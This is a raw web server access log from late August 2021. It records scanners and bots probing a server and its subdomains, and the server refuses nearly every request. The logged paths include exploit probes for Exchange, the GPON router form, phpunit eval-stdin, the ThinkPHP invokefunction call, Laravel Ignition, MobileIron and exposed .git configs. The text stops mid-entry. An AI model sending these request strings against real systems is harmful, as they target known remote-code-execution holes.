[23/Aug/2021:04:08:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Aug/2021:04:51:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.193.224.28] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [23/Aug/2021:04:52:42 +0000] 400 - GET http 4246672960 "/" [Client 107.189.31.114] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:05:50:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [23/Aug/2021:07:20:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Aug/2021:09:13:11 +0000] 444 - GET https localhost "/" [Client 122.224.129.237] [Length 0] [Gzip -] "-" "-" [23/Aug/2021:09:45:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 91.205.173.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Aug/2021:10:25:02 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.221.132] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:10:47:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Aug/2021:11:01:12 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [23/Aug/2021:11:05:26 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Aug/2021:12:23:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.129.56.200] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [23/Aug/2021:12:23:11 +0000] 400 - - https localhost "-" [Client 23.129.64.131] [Length 154] [Gzip -] "-" "-" [23/Aug/2021:12:23:13 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.147] [Length 0] [Gzip -] "-" "-" [23/Aug/2021:12:23:15 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.101.241] [Length 0] [Gzip -] "-" "-" [23/Aug/2021:13:39:19 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:19 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:21 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:23 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:25 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:26 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [23/Aug/2021:13:39:28 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:29 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:30 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:31 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:13:39:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Aug/2021:14:14:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [23/Aug/2021:14:20:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.105.91] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:15:14:00 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Aug/2021:17:01:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.205.177] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:17:01:16 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Aug/2021:17:01:16 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Aug/2021:17:01:16 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Aug/2021:17:01:16 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Aug/2021:17:01:16 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Aug/2021:17:01:16 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Aug/2021:17:13:14 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.161] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:17:20:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [23/Aug/2021:17:25:02 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.206.37] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:17:25:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:18:48:07 +0000] 444 - GET https trilium.moralanimal.net "/.git/config" [Client 89.234.157.254] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Aug/2021:18:49:26 +0000] 444 - GET https komga.moralanimal.net "/.git/config" [Client 185.220.100.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Aug/2021:18:59:16 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Aug/2021:19:25:24 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.219.173] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:20:09:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.96] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:23:13:28 +0000] 444 - GET https tpm.moralanimal.net "/.git/config" [Client 162.247.74.201] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Aug/2021:23:15:05 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.103] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:00:35:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Aug/2021:00:36:24 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [24/Aug/2021:01:10:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 221.163.230.197] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:01:24:35 +0000] 444 - GET https 64.22.31.253 "/zdrtyhmcfghn" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [24/Aug/2021:01:25:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:02:48:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [24/Aug/2021:02:49:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [24/Aug/2021:02:49:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [24/Aug/2021:02:49:18 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:02:49:19 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:02:49:20 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:02:49:25 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:02:49:25 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:02:49:26 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:02:49:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [24/Aug/2021:03:34:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:03:39:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:43 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:44 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:45 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:46 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [24/Aug/2021:03:39:47 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:49 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:50 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:51 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:03:39:56 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Aug/2021:04:30:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 91.205.173.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Aug/2021:05:00:43 +0000] 400 - - http localhost "-" [Client 89.248.165.100] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:05:57:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Aug/2021:05:58:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.160.33] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [24/Aug/2021:06:03:43 +0000] 400 - GET https localhost "/3Mjr" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:06:08:29 +0000] 444 - GET https traefik.moralanimal.net "/.git/config" [Client 185.220.101.12] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [24/Aug/2021:08:42:04 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:08:45:06 +0000] 400 - GET http 64.22.31.253 "/" [Client 43.132.240.51] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:09:13:11 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 35.199.173.158] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:09:29:36 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Aug/2021:09:55:54 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 124.126.78.178] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; LG G2 Build/170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [24/Aug/2021:10:15:39 +0000] 444 - GET https localhost "/" [Client 47.241.39.161] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:10:15:40 +0000] 444 - OPTIONS https localhost "/" [Client 47.241.39.161] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:10:15:41 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.241.39.161] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:10:15:43 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:10:15:48 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:10:15:49 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:10:15:50 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:10:15:51 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:10:15:52 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:10:15:53 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:10:15:54 +0000] 400 - - https localhost "-" [Client 47.241.39.161] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:10:16:17 +0000] 444 - GET https 64.22.31.253 "/nmaplowercheck1629800188" [Client 47.241.39.161] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:17 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.241.39.161] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:18 +0000] 400 - GET http 64.22.31.253 "/nmaplowercheck1629800188" [Client 47.241.39.161] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:18 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.241.39.161] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:18 +0000] 444 - GET https localhost "/" [Client 47.241.39.161] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:10:16:19 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.241.39.161] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:19 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.241.39.161] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:19 +0000] 400 - GET http localhost "/" [Client 47.241.39.161] [Length 252] [Gzip -] "-" "-" [24/Aug/2021:10:16:19 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.241.39.161] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:19 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.241.39.161] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [24/Aug/2021:10:16:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.39.161] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:10:16:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.241.39.161] [Length 252] [Gzip -] "-" "-" [24/Aug/2021:10:16:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.39.161] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:10:16:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.39.161] [Length 0] [Gzip -] "curl/7.75.0" "-" [24/Aug/2021:10:25:32 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.219.199] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:10:55:27 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:12:10:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [24/Aug/2021:12:18:27 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [24/Aug/2021:14:28:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [24/Aug/2021:15:23:31 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Aug/2021:16:15:41 +0000] 444 - GET https wordpress.moralanimal.net "/" [Client 144.15.255.227] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36" "-" [24/Aug/2021:16:15:42 +0000] 444 - GET https wordpress.moralanimal.net "/" [Client 144.15.255.227] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36" "-" [24/Aug/2021:16:39:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Aug/2021:17:01:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Aug/2021:17:01:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Aug/2021:17:01:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Aug/2021:17:01:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Aug/2021:17:01:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Aug/2021:17:01:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Aug/2021:17:02:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.197.11] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:17:14:33 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.6] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:17:25:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.193.167] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:19:06:55 +0000] 400 - - http localhost "-" [Client 92.63.197.16] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:19:06:55 +0000] 400 - - http localhost "-" [Client 92.63.197.16] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:19:06:55 +0000] 400 - - http localhost "-" [Client 92.63.197.16] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:20:08:50 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [24/Aug/2021:20:12:51 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.202.212] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:20:28:15 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Aug/2021:20:28:16 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 